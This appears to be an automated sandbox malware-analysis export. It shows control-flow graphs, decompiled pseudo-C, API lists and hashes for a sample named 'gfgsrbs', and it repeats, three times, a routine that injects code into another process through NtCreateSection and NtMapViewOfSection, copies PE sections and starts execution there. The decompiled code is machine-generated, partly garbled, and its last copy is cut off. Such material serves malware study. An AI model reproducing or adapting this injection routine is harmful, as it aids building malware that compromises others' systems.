                      control_flow_graph 0 4013d8-4013de 1 4013df-401409 0->1 6 401400-401405 1->6 7 40140c call 40119e 1->7 6->7 9 401411-40142b 7->9 10 401410 9->10 11 40142d-401435 9->11 10->9 12 401437-40143f 11->12 13 4013cc 11->13 17 401441-401447 12->17 18 40145d-40146c 12->18 14 4013b1-4013c5 13->14 15 4013ce-4013d5 13->15 20 401449 17->20 21 40142c 17->21 19 40146d-401472 18->19 22 401474 19->22 23 401457 19->23 24 40149a-4014a5 20->24 25 40144b-401450 20->25 21->1 21->11 22->19 28 401476-401478 22->28 26 401459-40145b 23->26 27 40143c-40143f 23->27 30 401452 25->30 31 4014bb-4014cd 25->31 26->18 27->17 27->18 32 40147a-401482 28->32 33 4014de-4014f1 call 40119e 28->33 30->23 36 4014d2-4014d7 31->36 37 4014cf-4014d1 31->37 39 401484 32->39 40 4014f3 33->40 41 4014f6-4014fb 33->41 36->33 37->36 39->39 40->41 43 401501-401512 41->43 44 401824-40182c 41->44 48 401822 43->48 49 401518-401541 43->49 44->41 47 401831-401842 44->47 51 401845-401866 call 40119e 47->51 52 401838-40183e 47->52 48->47 49->48 59 401547-40155e NtDuplicateObject 49->59 52->51 59->48 60 401564-401588 NtCreateSection 59->60 62 4015e4-40160a NtCreateSection 60->62 63 40158a-4015ab NtMapViewOfSection 60->63 62->48 66 401610-401614 62->66 63->62 65 4015ad-4015c9 NtMapViewOfSection 63->65 65->62 67 4015cb-4015e1 65->67 66->48 68 40161a-40163b NtMapViewOfSection 66->68 67->62 68->48 69 401641-40165d NtMapViewOfSection 68->69 69->48 71 401663 call 401668 69->71
                      Memory Dump Source
                      • Source File: 00000004.00000002.439481290.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_gfgsrbs.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0770cd10f47575dba946c72a205b39b8d4daa6ec592c66899ecf253aeda9c0e3
                      • Instruction ID: 67db8dc375151bfe257540867c3d287c712409260c0918a2d7cc4bffad82e0fd
                      • Opcode Fuzzy Hash: 0770cd10f47575dba946c72a205b39b8d4daa6ec592c66899ecf253aeda9c0e3
                      • Instruction Fuzzy Hash: 22912472600204ABDB219FA1CC44EEF7BB8EF81B14F10467AFA12BB1F5D6759905CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 73 4014a8-4014c4 77 4014db 73->77 78 4014cc-4014f1 call 40119e 73->78 77->78 82 4014f3 78->82 83 4014f6-4014fb 78->83 82->83 85 401501-401512 83->85 86 401824-40182c 83->86 90 401822 85->90 91 401518-401541 85->91 86->83 89 401831-401842 86->89 93 401845-401866 call 40119e 89->93 94 401838-40183e 89->94 90->89 91->90 101 401547-40155e NtDuplicateObject 91->101 94->93 101->90 102 401564-401588 NtCreateSection 101->102 104 4015e4-40160a NtCreateSection 102->104 105 40158a-4015ab NtMapViewOfSection 102->105 104->90 108 401610-401614 104->108 105->104 107 4015ad-4015c9 NtMapViewOfSection 105->107 107->104 109 4015cb-4015e1 107->109 108->90 110 40161a-40163b NtMapViewOfSection 108->110 109->104 110->90 111 401641-40165d NtMapViewOfSection 110->111 111->90 113 401663 call 401668 111->113
                      C-Code - Quality: 59%
                      			E004014A8(void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                      				char _v8;
                      				long _v12;
                      				void* _v16;
                      				void* _v20;
                      				char _v44;
                      				char _v52;
                      				long _v56;
                      				long _v60;
                      				char _v64;
                      				char _v68;
                      				char _v72;
                      				char _v76;
                      				char _v84;
                      				char _v88;
                      				char _v92;
                      				intOrPtr _v96;
                      				char _v100;
                      				void* __ebx;
                      				void* __edi;
                      				void* __ebp;
                      				void* _t84;
                      				intOrPtr _t87;
                      				long _t90;
                      				void* _t91;
                      				struct _GUID _t98;
                      				struct _GUID _t100;
                      				PVOID* _t102;
                      				PVOID* _t104;
                      				intOrPtr _t106;
                      				intOrPtr* _t108;
                      				PVOID* _t121;
                      				PVOID* _t123;
                      				intOrPtr _t127;
                      				intOrPtr _t128;
                      				intOrPtr _t129;
                      				long* _t130;
                      				signed int _t137;
                      				int _t138;
                      				signed int _t157;
                      				signed int _t158;
                      				signed int _t159;
                      				void* _t160;
                      				intOrPtr* _t161;
                      				void* _t164;
                      				void* _t171;
                      				long _t172;
                      				intOrPtr _t173;
                      				void* _t174;
                      				long* _t180;
                      				intOrPtr* _t181;
                      				HANDLE* _t182;
                      				HANDLE* _t183;
                      				void* _t188;
                      				void* _t189;
                      				intOrPtr* _t192;
                      				void* _t193;
                      				intOrPtr _t196;
                      				intOrPtr* _t197;
                      				intOrPtr* _t198;
                      				void* _t200;
                      				intOrPtr* _t201;
                      				void* _t202;
                      				long _t217;
                      
                      				_t84 = 0x14e3;
                      				_push(0x37f);
                      				_t128 =  *_t197;
                      				_t198 = _t197 + 4;
                      				L0040119E(_t84, _t128, _t171, __eflags);
                      				_t127 = _a4;
                      				_t172 = 0;
                      				_v56 = 0;
                      				if(gs != 0) {
                      					_v56 = _v56 + 1;
                      				}
                      				while(1) {
                      					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
                      					if(_t87 != 0) {
                      						break;
                      					}
                      					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
                      				}
                      				_v96 = _t87;
                      				_t180 =  &_v100;
                      				 *_t180 = _t172;
                      				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t180);
                      				_t90 =  *_t180;
                      				if(_t90 != 0) {
                      					_t130 =  &_v52;
                      					 *_t130 = _t90;
                      					_t130[1] = _t172;
                      					_t181 =  &_v44;
                      					 *((intOrPtr*)(_t127 + 0x10))(_t181, 0x18);
                      					 *_t181 = 0x18;
                      					_push( &_v52);
                      					_push(_t181);
                      					_push(0x40);
                      					_push( &_v20);
                      					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t172, _t172, 2) == 0) {
                      						_v12 = _t172;
                      						_t98 =  &_v84;
                      						 *(_t98 + 4) = _t172;
                      						 *_t98 = 0x5000;
                      						_t182 =  &_v88;
                      						if(NtCreateSection(_t182, 6, _t172, _t98, 4, 0x8000000, _t172) == 0) {
                      							_push(_v84);
                      							_pop( *_t25);
                      							_t121 =  &_v72;
                      							 *_t121 = _t172;
                      							if(NtMapViewOfSection( *_t182, 0xffffffff, _t121, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
                      								_t123 =  &_v64;
                      								 *_t123 = _t172;
                      								if(NtMapViewOfSection( *_t182, _v16, _t123, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
                      									_t196 = _v72;
                      									 *((intOrPtr*)(_t127 + 0x20))(_t172, _t196, 0x104);
                      									 *((intOrPtr*)(_t196 + 0x208)) = _a16;
                      									_v12 = _v12 + 1;
                      								}
                      							}
                      						}
                      						_t100 =  &_v84;
                      						 *(_t100 + 4) = _t172;
                      						 *_t100 = _a12 + 0x10000;
                      						_t183 =  &_v92;
                      						if(NtCreateSection(_t183, 0xe, _t172, _t100, 0x40, 0x8000000, _t172) == 0 && _v12 != 0) {
                      							_push(_v84);
                      							_pop( *_t46);
                      							_t102 =  &_v76;
                      							 *_t102 = _t172;
                      							if(NtMapViewOfSection( *_t183, 0xffffffff, _t102, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
                      								_t104 =  &_v68;
                      								 *_t104 = _t172;
                      								_t217 = NtMapViewOfSection( *_t183, _v16, _t104, _t172, _t172, _t172,  &_v60, 1, _t172, 0x20);
                      								if(_t217 == 0) {
                      									L21();
                      									if(_t217 == 0 && _t217 != 0) {
                      									}
                      									_t200 = _t198 + 4;
                      									_push(0x2e62);
                      									_t201 = _t200 + 4;
                      									_push(0x2260);
                      									_t106 =  *_t201;
                      									_t202 = _t201 + 4;
                      									_t157 = (0x2260 << 5) + _t106;
                      									asm("lodsb");
                      									_t158 = _t157;
                      									asm("loop 0xffffffc2");
                      									_t159 = _t158 ^ 0xbcc951dd;
                      									_t198 = _t202 - _t159;
                      									_t188 = _a8 +  *_a8;
                      									_t137 =  *(_t188 + 6) & 0x0000ffff;
                      									_push(_t188);
                      									_t160 = _t188;
                      									if(_v56 == 0) {
                      										_t161 = _t160 + 0xf8;
                      										__eflags = _t161;
                      									} else {
                      										_t161 = _t160 + 0x108;
                      									}
                      									_push(_t137);
                      									_t138 =  *(_t161 + 0x10);
                      									if(_t138 != 0) {
                      										memcpy( *((intOrPtr*)(_t161 + 0xc)) + _v76,  *((intOrPtr*)(_t161 + 0x14)) + _a8, _t138);
                      										_t198 = _t198 + 0xc;
                      									}
                      									asm("loop 0xffffffe6");
                      									_pop(_t189);
                      									_t222 = _v56;
                      									if(_v56 == 0) {
                      										_push(_t189);
                      										_t164 =  *((intOrPtr*)(_t189 + 0x34)) - _v68;
                      										_t192 =  *((intOrPtr*)(_t189 + 0xa0)) + _v76;
                      										__eflags = _t192;
                      										while(1) {
                      											__eflags =  *_t192;
                      											if( *_t192 == 0) {
                      												break;
                      											}
                      											_t173 =  *_t192;
                      											_t192 = _t192 + 8;
                      											asm("lodsw");
                      											__eflags = 0;
                      											if(0 != 0) {
                      												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t164;
                      												__eflags =  *((intOrPtr*)(0 + _v76 + _t173));
                      											}
                      											asm("loop 0xffffffe9");
                      										}
                      										_pop(_t193);
                      										_t172 = 0;
                      										__eflags = 0;
                      										_t108 =  &_v8;
                      										 *_t108 = 0;
                      										 *((intOrPtr*)(_t127 + 0x98))(_v16, 0, 0, 0, 0, 0,  *((intOrPtr*)(_t193 + 0x28)) + _v68, _v64, _t108, 0);
                      									} else {
                      										L54();
                      										_pop(_t174);
                      										_t172 = _t174 - 0x1760;
                      										 *((intOrPtr*)(_t172 + 0x1794)) = _t172 + 0x2c17;
                      										L00401227(_t127, _t172, _t222, _t172 + 0x2c17, 0x1ad);
                      										0x33();
                      										 *((intOrPtr*)(_t172 + 0x17b9)) = _t172 + 0x2c67;
                      										0x33();
                      									}
                      								}
                      							}
                      						}
                      					}
                      				}
                      				_t91 = 0x14e3;
                      				_push(0x37f);
                      				_t129 =  *_t198;
                      				return L0040119E(_t91, _t129, _t172, _t222);
                      			}

                      APIs
                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                      • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                      • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                      Memory Dump Source
                      • Source File: 00000004.00000002.439481290.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_gfgsrbs.jbxd
                      Similarity
                      • API ID: Section$View$Create$DuplicateObject
                      • String ID:
                      • API String ID: 1546783058-0
                      • Opcode ID: 2cfc8301c030803b858046a898f5dfafd46e7c9465d39b5d003f99b680b42ab3
                      • Instruction ID: cd3d7ef155730ff18c04e90283d35d9337f0c2e1175127a0e4488d23b7b2eda1
                      • Opcode Fuzzy Hash: 2cfc8301c030803b858046a898f5dfafd46e7c9465d39b5d003f99b680b42ab3
                      • Instruction Fuzzy Hash: B6511871900249BBEB219F91CC48FEBBBB9EF85B10F104129FA11BA2E5D7749941CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 115 4014b3-4014c4 117 4014db 115->117 118 4014cc-4014f1 call 40119e 115->118 117->118 122 4014f3 118->122 123 4014f6-4014fb 118->123 122->123 125 401501-401512 123->125 126 401824-40182c 123->126 130 401822 125->130 131 401518-401541 125->131 126->123 129 401831-401842 126->129 133 401845-401866 call 40119e 129->133 134 401838-40183e 129->134 130->129 131->130 141 401547-40155e NtDuplicateObject 131->141 134->133 141->130 142 401564-401588 NtCreateSection 141->142 144 4015e4-40160a NtCreateSection 142->144 145 40158a-4015ab NtMapViewOfSection 142->145 144->130 148 401610-401614 144->148 145->144 147 4015ad-4015c9 NtMapViewOfSection 145->147 147->144 149 4015cb-4015e1 147->149 148->130 150 40161a-40163b NtMapViewOfSection 148->150 149->144 150->130 151 401641-40165d NtMapViewOfSection 150->151 151->130 153 401663 call 401668 151->153
                      C-Code - Quality: 63%
                      			E004014B3(void* __ebx, void* __edi, void* __eflags) {
                      				void* _t84;
                      				intOrPtr _t87;
                      				long _t90;
                      				void* _t91;
                      				struct _GUID _t98;
                      				struct _GUID _t100;
                      				PVOID* _t102;
                      				PVOID* _t104;
                      				intOrPtr _t106;
                      				intOrPtr* _t108;
                      				PVOID* _t121;
                      				PVOID* _t123;
                      				intOrPtr _t128;
                      				intOrPtr _t130;
                      				intOrPtr _t131;
                      				long* _t132;
                      				signed int _t139;
                      				int _t140;
                      				signed int _t161;
                      				signed int _t162;
                      				signed int _t163;
                      				void* _t164;
                      				intOrPtr* _t165;
                      				void* _t168;
                      				long _t176;
                      				intOrPtr _t178;
                      				void* _t179;
                      				long* _t185;
                      				intOrPtr* _t187;
                      				HANDLE* _t188;
                      				HANDLE* _t189;
                      				void* _t194;
                      				void* _t195;
                      				intOrPtr* _t198;
                      				void* _t199;
                      				void* _t202;
                      				void* _t203;
                      				void* _t205;
                      				intOrPtr* _t206;
                      				intOrPtr* _t207;
                      				void* _t210;
                      				intOrPtr* _t211;
                      				void* _t212;
                      				long _t227;
                      
                      				_t206 = _t205 + 1;
                      				_t84 = 0x14e3;
                      				_push(0x37f);
                      				_t130 =  *_t206;
                      				_t207 = _t206 + 4;
                      				L0040119E(_t84, _t130, __edi, __eflags);
                      				_t128 =  *((intOrPtr*)(_t203 + 8));
                      				_t176 = 0;
                      				 *((intOrPtr*)(_t203 - 0x34)) = 0;
                      				if(gs != 0) {
                      					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
                      				}
                      				while(1) {
                      					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
                      					if(_t87 != 0) {
                      						break;
                      					}
                      					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                      				}
                      				 *((intOrPtr*)(_t203 - 0x5c)) = _t87;
                      				_t185 = _t203 - 0x60;
                      				 *_t185 = _t176;
                      				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t185);
                      				_t90 =  *_t185;
                      				if(_t90 != 0) {
                      					_t132 = _t203 - 0x30;
                      					 *_t132 = _t90;
                      					_t132[1] = _t176;
                      					_t187 = _t203 - 0x28;
                      					 *((intOrPtr*)(_t128 + 0x10))(_t187, 0x18);
                      					 *_t187 = 0x18;
                      					_push(_t203 - 0x30);
                      					_push(_t187);
                      					_push(0x40);
                      					_push(_t203 - 0x10);
                      					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, _t176, _t176, 2) == 0) {
                      						 *(_t203 - 8) = _t176;
                      						_t98 = _t203 - 0x50;
                      						 *(_t98 + 4) = _t176;
                      						 *_t98 = 0x5000;
                      						_t188 = _t203 - 0x54;
                      						if(NtCreateSection(_t188, 6, _t176, _t98, 4, 0x8000000, _t176) == 0) {
                      							 *_t25 =  *(_t203 - 0x50);
                      							_t121 = _t203 - 0x44;
                      							 *_t121 = _t176;
                      							if(NtMapViewOfSection( *_t188, 0xffffffff, _t121, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
                      								_t123 = _t203 - 0x3c;
                      								 *_t123 = _t176;
                      								if(NtMapViewOfSection( *_t188,  *(_t203 - 0xc), _t123, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
                      									_t202 =  *(_t203 - 0x44);
                      									 *((intOrPtr*)(_t128 + 0x20))(_t176, _t202, 0x104);
                      									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
                      									 *(_t203 - 8) =  *(_t203 - 8) + 1;
                      								}
                      							}
                      						}
                      						_t100 = _t203 - 0x50;
                      						 *(_t100 + 4) = _t176;
                      						 *_t100 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
                      						_t189 = _t203 - 0x58;
                      						if(NtCreateSection(_t189, 0xe, _t176, _t100, 0x40, 0x8000000, _t176) == 0 &&  *(_t203 - 8) != 0) {
                      							 *_t46 =  *(_t203 - 0x50);
                      							_t102 = _t203 - 0x48;
                      							 *_t102 = _t176;
                      							if(NtMapViewOfSection( *_t189, 0xffffffff, _t102, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
                      								_t104 = _t203 - 0x40;
                      								 *_t104 = _t176;
                      								_t227 = NtMapViewOfSection( *_t189,  *(_t203 - 0xc), _t104, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 0x20);
                      								if(_t227 == 0) {
                      									L20();
                      									if(_t227 == 0 && _t227 != 0) {
                      									}
                      									_t210 = _t207 + 4;
                      									_push(0x2e62);
                      									_t211 = _t210 + 4;
                      									_push(0x2260);
                      									_t106 =  *_t211;
                      									_t212 = _t211 + 4;
                      									_t161 = (0x2260 << 5) + _t106;
                      									asm("lodsb");
                      									_t162 = _t161;
                      									asm("loop 0xffffffc2");
                      									_t163 = _t162 ^ 0xbcc951dd;
                      									_t207 = _t212 - _t163;
                      									_t194 =  *((intOrPtr*)(_t203 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0xc))));
                      									_t139 =  *(_t194 + 6) & 0x0000ffff;
                      									_push(_t194);
                      									_t164 = _t194;
                      									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
                      										_t165 = _t164 + 0xf8;
                      										__eflags = _t165;
                      									} else {
                      										_t165 = _t164 + 0x108;
                      									}
                      									_push(_t139);
                      									_t140 =  *(_t165 + 0x10);
                      									if(_t140 != 0) {
                      										memcpy( *((intOrPtr*)(_t165 + 0xc)) +  *(_t203 - 0x48),  *((intOrPtr*)(_t165 + 0x14)) +  *((intOrPtr*)(_t203 + 0xc)), _t140);
                      										_t207 = _t207 + 0xc;
                      									}
                      									asm("loop 0xffffffe6");
                      									_pop(_t195);
                      									_t232 =  *((intOrPtr*)(_t203 - 0x34));
                      									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
                      										_push(_t195);
                      										_t168 =  *((intOrPtr*)(_t195 + 0x34)) -  *(_t203 - 0x40);
                      										_t198 =  *((intOrPtr*)(_t195 + 0xa0)) +  *(_t203 - 0x48);
                      										__eflags = _t198;
                      										while(1) {
                      											__eflags =  *_t198;
                      											if( *_t198 == 0) {
                      												break;
                      											}
                      											_t178 =  *_t198;
                      											_t198 = _t198 + 8;
                      											asm("lodsw");
                      											__eflags = 0;
                      											if(0 != 0) {
                      												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t168;
                      												__eflags =  *((intOrPtr*)(0 +  *(_t203 - 0x48) + _t178));
                      											}
                      											asm("loop 0xffffffe9");
                      										}
                      										_pop(_t199);
                      										_t176 = 0;
                      										__eflags = 0;
                      										_t108 = _t203 - 4;
                      										 *_t108 = 0;
                      										 *((intOrPtr*)(_t128 + 0x98))( *(_t203 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t199 + 0x28)) +  *(_t203 - 0x40),  *(_t203 - 0x3c), _t108, 0);
                      									} else {
                      										L53();
                      										_pop(_t179);
                      										_t176 = _t179 - 0x1760;
                      										 *((intOrPtr*)(_t176 + 0x1794)) = _t176 + 0x2c17;
                      										L00401227(_t128, _t176, _t232, _t176 + 0x2c17, 0x1ad);
                      										0x33();
                      										 *((intOrPtr*)(_t176 + 0x17b9)) = _t176 + 0x2c67;
                      										0x33();
                      									}
                      								}
                      							}
                      						}
                      					}
                      				}
                      				_t91 = 0x14e3;
                      				_push(0x37f);
                      				_t131 =  *_t207;
                      				return L0040119E(_t91, _t131, _t176, _t232);
                      			}

                      APIs
                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                      • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                      • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                      Memory Dump Source
                      • Source File: 00000004.00000002.439481290.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_gfgsrbs.jbxd
                      Similarity
                      • API ID: Section$View$Create$DuplicateObject
                      • String ID:
                      • API String ID: 1546783058-0
                      • Opcode ID: 6e59b7e5303ef17d3f4c775c21a888ce17b01420e14e5236be6b7b92dd2dae58
                      • Instruction ID: 39cbb5cf0de6fd42451f7104dd6b59036266353996c087b5e70b14ffae25b97f
                      • Opcode Fuzzy Hash: 6e59b7e5303ef17d3f4c775c21a888ce17b01420e14e5236be6b7b92dd2dae58
                      • Instruction Fuzzy Hash: 29512971900245BFEB219F91CC49FEF7BB9EF85B00F10412AFA11AA2A5D7709941CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 155 4014bf-4014c4 159 4014db 155->159 160 4014cc-4014f1 call 40119e 155->160 159->160 164 4014f3 160->164 165 4014f6-4014fb 160->165 164->165 167 401501-401512 165->167 168 401824-40182c 165->168 172 401822 167->172 173 401518-401541 167->173 168->165 171 401831-401842 168->171 175 401845-401866 call 40119e 171->175 176 401838-40183e 171->176 172->171 173->172 183 401547-40155e NtDuplicateObject 173->183 176->175 183->172 184 401564-401588 NtCreateSection 183->184 186 4015e4-40160a NtCreateSection 184->186 187 40158a-4015ab NtMapViewOfSection 184->187 186->172 190 401610-401614 186->190 187->186 189 4015ad-4015c9 NtMapViewOfSection 187->189 189->186 191 4015cb-4015e1 189->191 190->172 192 40161a-40163b NtMapViewOfSection 190->192 191->186 192->172 193 401641-40165d NtMapViewOfSection 192->193 193->172 195 401663 call 401668 193->195
                      C-Code - Quality: 62%
                      			E004014BF(void* __ebx, void* __edi, void* __eflags) {
                      				void* _t84;
                      				intOrPtr _t87;
                      				long _t90;
                      				void* _t91;
                      				struct _GUID _t98;
                      				struct _GUID _t100;
                      				PVOID* _t102;
                      				PVOID* _t104;
                      				intOrPtr _t106;
                      				intOrPtr* _t108;
                      				PVOID* _t121;
                      				PVOID* _t123;
                      				intOrPtr _t128;
                      				intOrPtr _t130;
                      				intOrPtr _t131;
                      				long* _t132;
                      				signed int _t139;
                      				int _t140;
                      				signed int _t159;
                      				signed int _t160;
                      				signed int _t161;
                      				void* _t162;
                      				intOrPtr* _t163;
                      				void* _t166;
                      				long _t174;
                      				intOrPtr _t176;
                      				void* _t177;
                      				long* _t183;
                      				intOrPtr* _t185;
                      				HANDLE* _t186;
                      				HANDLE* _t187;
                      				void* _t192;
                      				void* _t193;
                      				intOrPtr* _t196;
                      				void* _t197;
                      				void* _t200;
                      				void* _t201;
                      				intOrPtr* _t203;
                      				intOrPtr* _t204;
                      				void* _t207;
                      				intOrPtr* _t208;
                      				void* _t209;
                      				long _t224;
                      
                      				asm("invalid");
                      				_t84 = 0x14e3;
                      				_push(0x37f);
                      				_t130 =  *_t203;
                      				_t204 = _t203 + 4;
                      				L0040119E(_t84, _t130, __edi, __eflags);
                      				_t128 =  *((intOrPtr*)(_t201 + 8));
                      				_t174 = 0;
                      				 *((intOrPtr*)(_t201 - 0x34)) = 0;
                      				if(gs != 0) {
                      					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
                      				}
                      				while(1) {
                      					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
                      					if(_t87 != 0) {
                      						break;
                      					}
                      					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                      				}
                      				 *((intOrPtr*)(_t201 - 0x5c)) = _t87;
                      				_t183 = _t201 - 0x60;
                      				 *_t183 = _t174;
                      				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t183);
                      				_t90 =  *_t183;
                      				if(_t90 != 0) {
                      					_t132 = _t201 - 0x30;
                      					 *_t132 = _t90;
                      					_t132[1] = _t174;
                      					_t185 = _t201 - 0x28;
                      					 *((intOrPtr*)(_t128 + 0x10))(_t185, 0x18);
                      					 *_t185 = 0x18;
                      					_push(_t201 - 0x30);
                      					_push(_t185);
                      					_push(0x40);
                      					_push(_t201 - 0x10);
                      					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, _t174, _t174, 2) == 0) {
                      						 *(_t201 - 8) = _t174;
                      						_t98 = _t201 - 0x50;
                      						 *(_t98 + 4) = _t174;
                      						 *_t98 = 0x5000;
                      						_t186 = _t201 - 0x54;
                      						if(NtCreateSection(_t186, 6, _t174, _t98, 4, 0x8000000, _t174) == 0) {
                      							 *_t25 =  *(_t201 - 0x50);
                      							_t121 = _t201 - 0x44;
                      							 *_t121 = _t174;
                      							if(NtMapViewOfSection( *_t186, 0xffffffff, _t121, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                      								_t123 = _t201 - 0x3c;
                      								 *_t123 = _t174;
                      								if(NtMapViewOfSection( *_t186,  *(_t201 - 0xc), _t123, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                      									_t200 =  *(_t201 - 0x44);
                      									 *((intOrPtr*)(_t128 + 0x20))(_t174, _t200, 0x104);
                      									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
                      									 *(_t201 - 8) =  *(_t201 - 8) + 1;
                      								}
                      							}
                      						}
                      						_t100 = _t201 - 0x50;
                      						 *(_t100 + 4) = _t174;
                      						 *_t100 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
                      						_t187 = _t201 - 0x58;
                      						if(NtCreateSection(_t187, 0xe, _t174, _t100, 0x40, 0x8000000, _t174) == 0 &&  *(_t201 - 8) != 0) {
                      							 *_t46 =  *(_t201 - 0x50);
                      							_t102 = _t201 - 0x48;
                      							 *_t102 = _t174;
                      							if(NtMapViewOfSection( *_t187, 0xffffffff, _t102, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                      								_t104 = _t201 - 0x40;
                      								 *_t104 = _t174;
                      								_t224 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t104, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 0x20);
                      								if(_t224 == 0) {
                      									L21();
                      									if(_t224 == 0 && _t224 != 0) {
                      									}
                      									_t207 = _t204 + 4;
                      									_push(0x2e62);
                      									_t208 = _t207 + 4;
                      									_push(0x2260);
                      									_t106 =  *_t208;
                      									_t209 = _t208 + 4;
                      									_t159 = (0x2260 << 5) + _t106;
                      									asm("lodsb");
                      									_t160 = _t159;
                      									asm("loop 0xffffffc2");
                      									_t161 = _t160 ^ 0xbcc951dd;
                      									_t204 = _t209 - _t161;
                      									_t192 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
                      									_t139 =  *(_t192 + 6) & 0x0000ffff;
                      									_push(_t192);
                      									_t162 = _t192;
                      									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                      										_t163 = _t162 + 0xf8;
                      										__eflags = _t163;
                      									} else {
                      										_t163 = _t162 + 0x108;
                      									}
                      									_push(_t139);
                      									_t140 =  *(_t163 + 0x10);
                      									if(_t140 != 0) {
                      										memcpy( *((intOrPtr*)(_t163 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t163 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t140);
                      										_t204 = _t204 + 0xc;
                      									}
                      									asm("loop 0xffffffe6");
                      									_pop(_t193);
                      									_t229 =  *((intOrPtr*)(_t201 - 0x34));
                      									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                      										_push(_t193);
                      										_t166 =  *((intOrPtr*)(_t193 + 0x34)) -  *(_t201 - 0x40);
                      										_t196 =  *((intOrPtr*)(_t193 + 0xa0)) +  *(_t201 - 0x48);
                      										__eflags = _t196;
                      										while(1) {
                      											__eflags =  *_t196;
                      											if( *_t196 == 0) {
                      												break;
                      											}
